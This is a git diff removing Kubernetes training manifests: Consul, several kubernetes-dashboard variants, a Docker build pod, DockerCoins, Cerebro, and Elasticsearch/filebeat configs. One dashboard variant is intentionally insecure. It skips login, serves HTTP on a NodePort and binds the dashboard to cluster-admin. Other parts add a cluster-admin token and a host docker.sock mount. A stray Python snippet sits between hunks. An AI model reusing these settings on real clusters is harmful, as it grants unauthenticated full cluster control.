command: [ "sh", "-c", "consul leave" ]


@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]


@@ -1,340 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: http
port: 443
targetPort: http
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 9090
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 9090
name: http
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard


@@ -1,325 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume


@@ -1,355 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin


@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
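The clone-build-push sequence from the pod's script could also be expressed with the docker Python SDK; a sketch, assuming the repository is already cloned to /workspace and REGISTRY_PORT is set in the environment (still a placeholder, as in the manifest above):

import os

import docker

registry_port = os.environ["REGISTRY_PORT"]  # placeholder, as above
tag = "localhost:{}/worker".format(registry_port)

client = docker.from_env()  # talks to the Docker socket mounted into the pod
# Build the worker image from the checked-out source tree...
image, build_logs = client.images.build(
    path="/workspace/dockercoins/worker",
    tag=tag,
)
# ...then push it to the cluster-local registry.
client.images.push(tag)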


@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker


@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]

View File

@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1

View File

@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
